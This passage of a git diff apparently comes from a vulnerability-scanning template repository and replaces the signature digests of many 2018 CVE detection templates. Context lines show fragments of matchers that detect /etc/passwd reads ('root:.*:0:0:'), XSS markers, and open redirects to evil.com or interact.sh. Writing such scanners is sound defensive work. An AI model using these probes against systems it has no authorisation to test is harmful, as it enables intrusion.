490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f345418a161970b49efb6847c938b02cf85e55ab2728b7a999c99c1298947949022011733c212eabc394a4c104cef7a0ae31b2b2297505c4c2364ac73d2dad0c2411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16288.yaml b/http/cves/2018/CVE-2018-16288.yaml index 31b1b073df..7ed174c5b3 100644 --- a/http/cves/2018/CVE-2018-16288.yaml +++ b/http/cves/2018/CVE-2018-16288.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25577d15cb32f1ccc5b8c48bd1cee8c81f2c55bf33b6c19e89312d5e7cedc150221008796a9740e57e6b50caf52841a8a4c9d52a17662d1d3ae7bea7549de24603e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 8fce44ae25..92f2cb104f 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018fd3deeccb83eb769fde94c8460fb450d314b6cd1d5f09e5e6673e66c1f30d5022100e35701ec81596fff8cae290f6d481ccbebcaeb0da6573b1f149d30d8f945a163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b54f467183de3b3a31a23eff25fa6b7e31a40b596318042dd4a50afc2466987b02201e7898d41a785ccdb33f9ead77fbcab180c3bc0dca2a626981f431882fed4cb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 093cbd5654..1e250bb291 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204562ef9fe20f212abf05ec4054f5fb31ac2f4a14939814e81691480bad569df00221008627875be3d1ece4db50fe44826d8bcb8aa0b34273478d04591d11762f1a31eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 543356e243..659b6f5ad7 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aa22ae2b5004894a2274f6ac1b4e153cdcd9a2081a3e84d0853a7612a808693f02202177babac08cedd1a18e2d633c4f2705131f42a6354c14302ec02ebddbfdaf1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204094d65babc7f0b5c8c10d59b17d51f9ce5a347b0e0a86a8b1f4d4b26623b06202204860bf57ffcc49976f3017bfba65e702e9b416919b8f7e5bd18ad345625f0285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 38a7254a31..cccc297153 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d269609e9e99d0bdcd79d0fcc8f5b9fbcf7c09469f92d28e20e23c0c03b931b7022054d56d332e1163cb08f2567a622b794aaa85cb5d57b3e78cce3aa57152c9b586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c2df0229ff7748acdd22d008c7f88c515a2b5fe7b93f0be7ff4faeaa59e37ca02210082b5dd9724a4b7d1b568fb6c433bcebd074fd44c03fc25152b56981c927cf3a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index df5c6fa029..2df7730492 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f0f643f0280b3aefe1f1955b44b15712d5ccbcbdf55470bf60ae139ad08b3870221008a61c94baf588d5590ba60988681f69ac91aa02ad71a098ac1c191a627a45c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml index 5a40cf4a8c..e0dccd1114 100644 --- a/http/cves/2018/CVE-2018-17153.yaml +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -50,4 +50,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and -# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022058db5a0e66e0185894958f6d96aecf72c3bcfed2c0a1d26f6add29d09ce286c802200fc8d42f35b7c7769ee299622a43e1f8505ee63afe91b259c4ea10fdaaaff74a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 7beff17567..0247e45dfa 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -56,4 +56,4 @@ http: part: header words: - "application/json" -# digest: 4b0a0048304602210082c27b58a7f2461aff554dd5d689c6b64d365eb7a4307bb262df7556c0cfa5bd022100ccdcc3e07ad2d7fbb7a24bf16ad8d46efb371342f7048f1d74eba4b0db5eb126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220617b736bbf999b2273a36778922c989410f903fe4ffae35247d32cf4ee34ebb3022100c153e7a8dc7347707d23c5b67d8a30b1b569d1043c8aa5b1c7a09f288bd0ce50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 63ae0948f8..93ef2179f2 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -43,4 +43,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4a0a00473045022100b261fe2697190cd7fac57caae056784c0fcdafa77339c5b1b838502a79539d01022021a432a3def85765211df2c94058fa14b19323731d5e4f2f7735033eef2d39b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc614c7ce6111ad91c84bd0aa0ea41a890f1011589191cb9bf421297dcb368c0022014a093e4b3f0c08bb8ae522059822568b1460a62461658ab6f3f0239ec6a8e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 18a7b2afcb..82a7c3ab6a 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -45,4 +45,4 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203711794115d3d48fe1e54bde3f66294c6322bb5832ec13b693571002187aef62022005459fec38936e0160b953d01498c72eb1547cb6cb2acc349339e9198d2af996:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 805cbeff17..fe101065ea 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff8e2819554ce13b65be92c0e0817693ae784d7a5bda9516043c29baf3aa80d3022100e51109d7d609a86eae88cc6ca27706ca658e1257ee76890516cbb810a1b12acf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index d4f8177ae5..8210788332 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220318183b633bf06ad5dedd98bf1929813ef1aab3b120ded116f2cd9da41f85aad022067f75907e311865be4f21eebd8f882881327795f9e270152c2481e329852031e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220573467f2d253679a8ca0abe62ede74d07eb4b89953992c906843c11cad9a695e02201a0f31679a22b7dbe2e68ad75b65e94e48e09602d688d256fa627afd2f05dc5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index ecb172f620..628e40044e 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100870181dff2cc23ffa33481a36635ca4a4f911568dce9684506b7821543d13142022100e1061c9704ccc5dd1a6f543126424fe9367250781f89af9d135c8d268b6c6909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072a99586909e4df9893ddbe97f55ceea487163c8a6d2fa7bb1fd3f426fff0a31022100b894b36b035f3eb1fca2f1ff1dd4c79b5e5e1140d19e9ee8f1e90b9b36ac21e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 4e97a203a8..a995d5aba7 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ada522c6515fbef84bfe2b72a16b37eef4b726a80645ce815f8c839f8c3de084022100a9cee0e3010f2c7eab42fd53f0e934584477eeedaf5019a443621776728004e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c43687be0d104b8b61c5820fb3108d1d4a4cfa6bea57b77dcbcd94a7af9ea2e022100936a9dd029ea2f1718385f1222bd9262bae98a93d800bfc22900ee053409f0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 27f9cdb3c9..834b7ac852 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5bd07c891d0db92b2c4f1e4cbadea6203eafbdf92fabe4996837f51c1c865140221009130e54e81edb9b84222f0c1678adb7130f74463a53656948e28b6ad2491440e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae2a757ac5e3ef34ba3a5451c8125e2c7fe97fd9bef596f66376117e2764db670221008367fce471250198dca07e7745de56033b0108d5296706c7f9484ab47fed9ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index c43ce87f60..3e8b1624af 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dde2f46dea081ad6ee497f625921fa627e85d86066f46bf0412c3baea3dee44c022100e29b218c3b2f0d942643f9520686a1c2ac7ffe7606193b38c7433e3006313eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb4b10a8be843bbc16bdad1882a670d91a4df47976608093c047e589d1ec9d5f022100db20167c16d3b5a54b8abadd1035b44725fa8989926dadda9c968bc8727520d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index ea93f406fa..7f19b027a3 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220643bdad602251cc6d58d10ec184ad17a9593ec38da13e56f779cf51b825cb69d022100ba41ad28cf862dd0e27bf39455c80ca81106197236893508abca3f291d04b6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 963396b644..656f2b91d4 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -46,4 +46,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")' -# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c343b83bb6fcdc9813518d37b54f04f87156c39b79722af6ac38cc7fdd596bca0220703ec1e97ae904cd7b353800c82f2b395a48062f8439eec1b4b4a2a9eabe91c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index afccd29931..13bedfdfac 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f031d999e765991f0aa2d1aae2aa9d4c79d9a3839f1dcf48b2c61a3f22a12a2a02202bbbf84485e9943cb9edeb0da4319e13626c70d6079238edafe328e4e16318fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 9f10e7535b..f7e60c03fc 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017ffefd669f716542939f3fbf7cb21c395e7c7444f9c185954a4b4d3f5db6f09022100960d179e7780f639d861a3b9a8d4a7186dc971253532f6ecf8aaaee57396e1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fb81765e18255ee1455d4ffdf1c2f4a8423e9fa99a230aef65bdf36dce39db4022100ab9385e54fd245662105f2243c1d25bc4e1c82be787d4f23aea1c9273d13a2cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index f3bd161914..3f65170707 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -49,4 +49,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007c53cf671939677e00de61243865a0068c5542caaa6c5cd30f75ccdd260b635022100f46356ee53fbf6fa0d8cd6812648b170cec5116aa67dee258bc1d3a8601851da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 038510ea48..5e97818e28 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d7436ced4be69231d67f9b6d6fddf86f75ca1a49358007478a1cacc3869f56c02206093ccabaa5b727f429b541d96da3d9028334eb9b029a25ba8128795d70b7f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 18852cc354..7fbd5422cb 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb661a6ea402a8fe1df0ba6f686efa2e17994e84eb11f9c17383364f88f285880220308c0de4c8f2b5e65feb3809c645cc919a6494252251cc678e86295fca8383a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7e6ee6c4a5dacc72f204038317f3d576080fb833cb02aab58fb9a32ac0339ed0220684eb3d85d15b9ecff6fc2978c4574372dc3adf26c14c12edff24287e95f6c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index dcec2bddcb..617694b8dd 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -38,4 +38,4 @@ http: part: body words: - "<script>alert(1337)</script><!--" -# digest: 4a0a00473045022034e4f3773f6fe6c17c2785fc9f503480a43a4592a29941cd299c3b270443e977022100b542dd168aea80fc80f765fbdd82311ec2ec4f6b2b73c9ddbfaa6600da4ceddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b56844229e6ea053b76640548002d26a57799ac1aadafb6ac77fe1d2972d54f4022100a6626f55ef074890ccbffc21b3a56cc95fb44114a0314ae2a1cca4245a7d0956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 6489b3df7e..c2f77901aa 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220204f850c1e4defb3d1370eca6bbeda7634b6bae66b03d027afb26bedc5a812790221008d7871c547a7ed1deeb7c785fd365cc8f4ff36b31cf24980d303f8a20351e93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011870a0b8c603246e50b7b9233e220338e0bbadfd36d43476eb3a604a8f15909022100fd66dce4ecef6a71328de5d49b7f2c823806736b0f6d62098d105a9fbb5fd37a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 6304862422..f5baab9f0d 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - "contains(body_3, '>')" condition: and -# digest: 4b0a00483046022100c2a0e755f2e7f7a0744d4444c1e2d3880abdcaf721e4f7a8dc1e593faaf4521e0221008758fdacd7ef1cdf080680a53f6ab8d435d736dbc60a7c8f9440afa49d90d100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049417fe6bfe7dcc4ad5a03f7e74d98650d87b5d7245e8b3222aa41a4a1809a1702201961b9d27ac98ce526df8f1b59834668eda162155a7a5f7a858d647ea60e7ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 3d18f63916..380099a6ff 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220233adb77a26a1b91da079bdf0eb8b3aae6997e9e8eafc1246a94b187acbcf10e022100cc16f3f453b69215c3af952bc5f242abcd26f8e2c38445664464564ddb39f26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201707716fab9d016dc5515f68c70df0fb1e11303df71bd29e6948decdff46feec02201ff410eb73141ddfa99e74625b1f20c3225ff3fd33ddf6269d783113327efc71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 82d738f155..75c7ac7400 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203b1e3f5a79179da858d3ed0fe9cfc7c1a14782a0a49ed6cc890416c693cc750802204c31d262dd2fe2068a966af611deae253623d196a0a03e790194ec274a50c467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8023778b8d9d0e2a4b1e77c7200d3ecab62642b04c19419876641d5065ad736022100a7d6988ea608d6df29fba1b12d6b37f695f46be24d54be889f7b785d5b0a331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index bf0f6435cf..8527c4570b 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 4a0a00473045022100ad4d510c1ce185b5e401199a825d93783a0f561aa134a108265d89f119b1d1750220431ecb234bab21342ca9f250c34c079cce22eeeffd6f278fcb778923f3661b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082567122e6fdb26a676a6bf9632fb1376794f424c30727b0a814271d6d61ce20022045995d0b06448d4e6a25a10ee8b63a3dd2537e8dbf054859a7c5ac26000d3d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 4849988a1a..6388d0d596 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 490a0046304402201c56275b5b7376244d1fee0f3bfde7381ade0cb088f1643b3c5e1e668e81b4490220205f8398d1ae9260a0ecd27f592441a68d4709a669d802e783370b414c610020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fac7ca8ae973e6c79b47d129a94c03d07d3e0934745e51edb52510fd5ae51aa502210083fdaf58ca60aa3c6a60cd156c45000e72257ba726ed8cc254fb10cc62edc2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 953e994164..b86732351d 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 4a0a004730450220228d241f2ef228aa07915c9b1770c0a34473f66ec0ee918ba511d13df0a08d64022100e196267d6f49e1a417092b2d74d1123fbd4c5d366bb4ed2f01e227431da6b846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af0ae3cbc2a555217c64dff7da257aeb9cfbae5552ff0f531b5b20c3672028cd022057d92c9509347c4bab862fe765ae5dd01ac0bd3a52932e1fce59f3299a038292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 6401a9bde0..dc31dcf008 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220416555074a2363c09646f56423f9c459c447e730675f68f1c7a1139e2349e881022100d3472326257aa27dec50b113e6f576559301190c17b3ea7436347e20c6f83fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204719a63abf07b3b3a032779a7bab0597c6f4ae74729ada98a4725a344d8fe104022100fcd44b9a53fcd6525a05dd74f322e03b13200615741b6a14fdaba4d5ca989999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 64e5e72dc3..8d404e7272 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -85,4 +85,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220437d3c29a18e53486a8e39f9ad913b02a35912b2bcb3c21e63e069c76fe4f154022100a4d6a84d1e7d454bdc3f5c9758a7d44ea6d1c23ce4ad0a31a88d07f3a9aad85b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ee02dd47b6b3c05b72a24cdb480ebcc738ba4837418f2ac64ab1dfeab56a387022100f2c41a434ce9405e513488732ab8468d5d007f7507f6a3a740f78bc65bbe2cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 4c87867f11..4135025d8b 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cacbdeb0c0af358ac6503810fd58e5fc0911a7c724b4bd307787bc2a6ae191e5022100e3b0228d4c1ba7bf5ead1493a9895e11d08a9a54416af57cd5e6a90616e82cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220451e0c729542bbf1f70a346710c8cc9f758c0e3517c5c0664ef0e781961e55d40221009d3fe32da8a123ae8a019a4c99ed760251ef534e01f21ab955844156628bcea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 9fcb7d32f2..79e24ec02c 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fdf21dd8cd4338be7ef85dd90d5a1ee48232987d93292d9c32864bb6cb2d2a430220312aab11cf40c9bd216d8db9bc9f8f4986e176b437d99d3e68974648edb3f37d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220465e274aa68efa6686c443bbbe9e61467f303374cdbc4a1a88bee6a3a4e792ef02201c9beb67a520e6effc9618566ca883bd170c9262e7ae52530ec543ba9390b37a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index cca5ece28d..969faa9ec4 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -52,4 +52,4 @@ http: - '' - 'Missing translation key' condition: and -# digest: 